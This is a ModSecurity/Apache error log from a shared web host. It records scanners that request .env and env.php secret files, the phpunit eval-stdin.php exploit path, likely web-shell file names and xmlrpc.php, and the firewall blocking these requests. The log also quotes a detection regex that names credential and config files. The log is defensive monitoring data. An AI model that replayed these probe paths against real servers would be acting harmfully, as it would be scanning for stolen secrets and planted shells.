[Tue May 26 16:28:53.913579 2026] [security2:error] [pid 795941:tid 796095] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV87e2GQ_TLE_VHIp2yPAAAAJ0"]
[Tue May 26 16:28:54.242447 2026] [security2:error] [pid 795941:tid 796153] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV87e2GQ_TLE_VHIp2yMwAAANc"]
[Tue May 26 16:28:54.356389 2026] [security2:error] [pid 795941:tid 796075] [client 74.249.212.138:7073] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/goods.php"] [unique_id "ahV87u2GQ_TLE_VHIp2yRwAAAIk"]
[Tue May 26 16:28:54.356502 2026] [security2:error] [pid 795941:tid 796075] [client 74.249.212.138:7073] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/goods.php"] [unique_id "ahV87u2GQ_TLE_VHIp2yRwAAAIk"]
[Tue May 26 16:28:54.688450 2026] [security2:error] [pid 795941:tid 796112] [client 92.118.39.194:59308] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/laravel/.env"] [unique_id "ahV87u2GQ_TLE_VHIp2yUQAAAK4"]
[Tue May 26 16:28:55.402055 2026] [security2:error] [pid 795941:tid 796072] [client 92.118.39.194:59332] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 194.39.118.92.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/app/etc/env.php"] [unique_id "ahV87-2GQ_TLE_VHIp2yXgAAAIY"]
[Tue May 26 16:28:55.640722 2026] [security2:error] [pid 795941:tid 796080] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV87-2GQ_TLE_VHIp2yYQAAAI4"]
[Tue May 26 16:28:55.953559 2026] [security2:error] [pid 795941:tid 796129] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV87-2GQ_TLE_VHIp2yWgAAAL8"]
[Tue May 26 16:28:56.135240 2026] [security2:error] [pid 795941:tid 796139] [client 74.249.212.138:7080] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/ms-edit.php"] [unique_id "ahV88O2GQ_TLE_VHIp2ybwAAAMk"]
[Tue May 26 16:28:56.135366 2026] [security2:error] [pid 795941:tid 796139] [client 74.249.212.138:7080] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/ms-edit.php"] [unique_id "ahV88O2GQ_TLE_VHIp2ybwAAAMk"]
[Tue May 26 16:28:57.500938 2026] [security2:error] [pid 795941:tid 796078] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV88e2GQ_TLE_VHIp2ymAAAAIw"]
[Tue May 26 16:28:57.675069 2026] [security2:error] [pid 795941:tid 795971] [remote 74.7.241.15:45966] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 15.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.lodgerajasabai212.svijaykumar.in"] [uri "/l212-website-privacy.php"] [unique_id "ahV88e2GQ_TLE_VHIp2ypAAA9h0"], referer: https://www.lodgerajasabai212.svijaykumar.in/
[Tue May 26 16:28:57.913215 2026] [security2:error] [pid 795941:tid 796146] [client 92.118.39.194:59056] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "yourstorybag.com"] [uri "/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahV88e2GQ_TLE_VHIp2ypgAAANA"]
[Tue May 26 16:28:58.171690 2026] [security2:error] [pid 795941:tid 796122] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV88e2GQ_TLE_VHIp2yowAAALg"]
[Tue May 26 16:28:58.606474 2026] [security2:error] [pid 795941:tid 796177] [client 92.118.39.194:59416] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV88u2GQ_TLE_VHIp2ytQAAAO8"]
[Tue May 26 16:28:58.799089 2026] [security2:error] [pid 795941:tid 796152] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV88u2GQ_TLE_VHIp2yuwAAANY"]
[Tue May 26 16:28:59.157713 2026] [security2:error] [pid 795941:tid 796156] [client 104.28.71.84:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahV88u2GQ_TLE_VHIp2ywwAAANo"]
[Tue May 26 16:28:59.203566 2026] [security2:error] [pid 795941:tid 796174] [client 74.249.212.138:7084] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/222.php"] [unique_id "ahV88-2GQ_TLE_VHIp2yxgAAAOw"]
[Tue May 26 16:28:59.203691 2026] [security2:error] [pid 795941:tid 796174] [client 74.249.212.138:7084] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/222.php"] [unique_id "ahV88-2GQ_TLE_VHIp2yxgAAAOw"]
[Tue May 26 16:28:59.778570 2026] [security2:error] [pid 795941:tid 796115] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV88-2GQ_TLE_VHIp2y1gAAALE"]
[Tue May 26 16:28:59.960562 2026] [security2:error] [pid 795941:tid 796183] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV88-2GQ_TLE_VHIp2y5gAAAPU"]
[Tue May 26 16:28:59.965522 2026] [security2:error] [pid 795941:tid 796092] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV88-2GQ_TLE_VHIp2y5QAAAJo"]
[Tue May 26 16:29:00.002428 2026] [security2:error] [pid 795941:tid 796116] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV88-2GQ_TLE_VHIp2y6QAAALI"]
[Tue May 26 16:29:00.106359 2026] [security2:error] [pid 795941:tid 796077] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV89O2GQ_TLE_VHIp2y8QAAAIs"]
[Tue May 26 16:29:00.220888 2026] [security2:error] [pid 795941:tid 796088] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV88-2GQ_TLE_VHIp2y3QAAAJY"]
[Tue May 26 16:29:00.461834 2026] [security2:error] [pid 795941:tid 796192] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV89O2GQ_TLE_VHIp2y9QAAAP4"]
[Tue May 26 16:29:01.527900 2026] [security2:error] [pid 795941:tid 796108] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV89e2GQ_TLE_VHIp2zCQAAAKo"]
[Tue May 26 16:29:02.296313 2026] [security2:error] [pid 795941:tid 796193] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV89e2GQ_TLE_VHIp2zFQAAAP8"]
[Tue May 26 16:29:02.410761 2026] [security2:error] [pid 795941:tid 796077] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV89u2GQ_TLE_VHIp2zHgAAAIs"]
[Tue May 26 16:29:02.543266 2026] [security2:error] [pid 795941:tid 796099] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV89u2GQ_TLE_VHIp2zIQAAAKE"]
[Tue May 26 16:29:03.623352 2026] [security2:error] [pid 795941:tid 796113] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV89-2GQ_TLE_VHIp2zPQAAAK8"]
[Tue May 26 16:29:03.839142 2026] [security2:error] [pid 795941:tid 796184] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV89-2GQ_TLE_VHIp2zMwAAAPY"]
[Tue May 26 16:29:03.926698 2026] [security2:error] [pid 795941:tid 796041] [remote 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV89-2GQ_TLE_VHIp2zRQAAmmM"]
[Tue May 26 16:29:03.926848 2026] [security2:error] [pid 795941:tid 796092] [client 2804:4ec:1105:5184:bc56:f1a3:ab96:52e1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahV89-2GQ_TLE_VHIp2zRQAAmmM"]
[Tue May 26 16:29:04.346972 2026] [security2:error] [pid 795941:tid 796158] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV8-O2GQ_TLE_VHIp2zTAAAANw"]
[Tue May 26 16:29:04.526851 2026] [security2:error] [pid 795941:tid 796099] [client 74.249.212.138:7142] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/cgi-bin/index.php"] [unique_id "ahV8-O2GQ_TLE_VHIp2zUAAAAKE"]
[Tue May 26 16:29:04.526954 2026] [security2:error] [pid 795941:tid 796099] [client 74.249.212.138:7142] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/cgi-bin/index.php"] [unique_id "ahV8-O2GQ_TLE_VHIp2zUAAAAKE"]
[Tue May 26 16:29:04.534363 2026] [security2:error] [pid 795941:tid 796046] [remote 74.7.241.58:37462] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahV8-O2GQ_TLE_VHIp2zUQAA9Gg"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:29:04.831756 2026] [security2:error] [pid 795941:tid 796103] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV8-O2GQ_TLE_VHIp2zWwAAAKU"]
[Tue May 26 16:29:04.891233 2026] [autoindex:error] [pid 795941:tid 796097] [client 168.144.159.173:47880] AH01276: Cannot serve directory /home2/debatqhn/homegategardensandsuites.com.ng/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:29:05.778354 2026] [security2:error] [pid 795941:tid 796086] [client 74.249.212.138:7151] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "webmail.gldmarsa.com"] [uri "/___proxy_subdomain_webmail/wp-includes/css/dist/"] [unique_id "ahV8-e2GQ_TLE_VHIp2zeQAAAJQ"]
[Tue May 26 16:29:05.880239 2026] [security2:error] [pid 795941:tid 796090] [client 92.118.39.194:59044] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "yourstorybag.com"] [uri "/var/www/html/.env"] [unique_id "ahV8-e2GQ_TLE_VHIp2zegAAAJg"]
[Tue May 26 16:29:06.234778 2026] [security2:error] [pid 795941:tid 796158] [client 74.249.212.138:7151] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/BDKR28WP.php"] [unique_id "ahV8-u2GQ_TLE_VHIp2zhgAAANw"]
[Tue May 26 16:29:06.234948 2026] [security2:error] [pid 795941:tid 796158] [client 74.249.212.138:7151] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/BDKR28WP.php"] [unique_id "ahV8-u2GQ_TLE_VHIp2zhgAAANw"]
[Tue May 26 16:29:06.370285 2026] [security2:error] [pid 795941:tid 796148] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8-e2GQ_TLE_VHIp2zfQAAANI"]
[Tue May 26 16:29:06.399029 2026] [autoindex:error] [pid 795941:tid 796170] [client 168.144.159.173:39652] AH01276: Cannot serve directory /home2/debatqhn/homegategardensandsuites.com.ng/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 16:29:07.345883 2026] [security2:error] [pid 795941:tid 796076] [client 74.249.212.138:7165] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "webmail.gldmarsa.com"] [uri "/___proxy_subdomain_webmail/wp-includes/l10n/"] [unique_id "ahV8--2GQ_TLE_VHIp2znQAAAIo"]
[Tue May 26 16:29:07.473710 2026] [security2:error] [pid 795941:tid 796142] [client 74.249.212.138:7165] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "webmail.gldmarsa.com"] [uri "/___proxy_subdomain_webmail/wp-content/uploads/"] [unique_id "ahV8--2GQ_TLE_VHIp2zoQAAAMw"]
[Tue May 26 16:29:07.532709 2026] [security2:error] [pid 795941:tid 796075] [client 74.249.212.138:7165] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/wp.php"] [unique_id "ahV8--2GQ_TLE_VHIp2zowAAAIk"]
[Tue May 26 16:29:07.532798 2026] [security2:error] [pid 795941:tid 796075] [client 74.249.212.138:7165] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/wp.php"] [unique_id "ahV8--2GQ_TLE_VHIp2zowAAAIk"]
[Tue May 26 16:29:07.699865 2026] [security2:error] [pid 795941:tid 796087] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV8--2GQ_TLE_VHIp2zpgAAAJU"]
[Tue May 26 16:29:07.925530 2026] [security2:error] [pid 795941:tid 796185] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV8--2GQ_TLE_VHIp2ztAAAAPc"]
[Tue May 26 16:29:08.165550 2026] [security2:error] [pid 795941:tid 796118] [client 74.249.212.138:7057] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/abcd.php"] [unique_id "ahV8_O2GQ_TLE_VHIp2zvwAAALQ"]
[Tue May 26 16:29:08.165689 2026] [security2:error] [pid 795941:tid 796118] [client 74.249.212.138:7057] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/abcd.php"] [unique_id "ahV8_O2GQ_TLE_VHIp2zvwAAALQ"]
[Tue May 26 16:29:08.287216 2026] [security2:error] [pid 795941:tid 796195] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8--2GQ_TLE_VHIp2zrAAAAQE"]
[Tue May 26 16:29:08.486024 2026] [security2:error] [pid 795941:tid 796194] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV8_O2GQ_TLE_VHIp2zxQAAAQA"]
[Tue May 26 16:29:08.779732 2026] [security2:error] [pid 795941:tid 796100] [client 74.249.212.138:7134] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/a1.php"] [unique_id "ahV8_O2GQ_TLE_VHIp2zzAAAAKI"]
[Tue May 26 16:29:08.779862 2026] [security2:error] [pid 795941:tid 796100] [client 74.249.212.138:7134] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/a1.php"] [unique_id "ahV8_O2GQ_TLE_VHIp2zzAAAAKI"]
[Tue May 26 16:29:09.173317 2026] [security2:error] [pid 795941:tid 796079] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV8_e2GQ_TLE_VHIp2z0gAAAI0"]
[Tue May 26 16:29:09.553288 2026] [security2:error] [pid 795941:tid 796196] [client 74.249.212.138:7064] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/wp-includes/Text/Diff/Engine/about.php"] [unique_id "ahV8_e2GQ_TLE_VHIp2z2QAAAQI"]
[Tue May 26 16:29:09.553465 2026] [security2:error] [pid 795941:tid 796196] [client 74.249.212.138:7064] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/wp-includes/Text/Diff/Engine/about.php"] [unique_id "ahV8_e2GQ_TLE_VHIp2z2QAAAQI"]
[Tue May 26 16:29:09.840831 2026] [security2:error] [pid 795941:tid 796091] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV8_e2GQ_TLE_VHIp2z4wAAAJk"]
[Tue May 26 16:29:10.160115 2026] [security2:error] [pid 795941:tid 796193] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV8_e2GQ_TLE_VHIp2z4AAAAP8"]
[Tue May 26 16:29:10.208561 2026] [security2:error] [pid 795941:tid 796146] [client 92.118.39.194:6056] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV8_u2GQ_TLE_VHIp2z5wAAANA"]
[Tue May 26 16:29:10.234065 2026] [security2:error] [pid 795941:tid 796089] [client 74.249.212.138:7089] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/bal.php"] [unique_id "ahV8_u2GQ_TLE_VHIp2z7AAAAJc"]
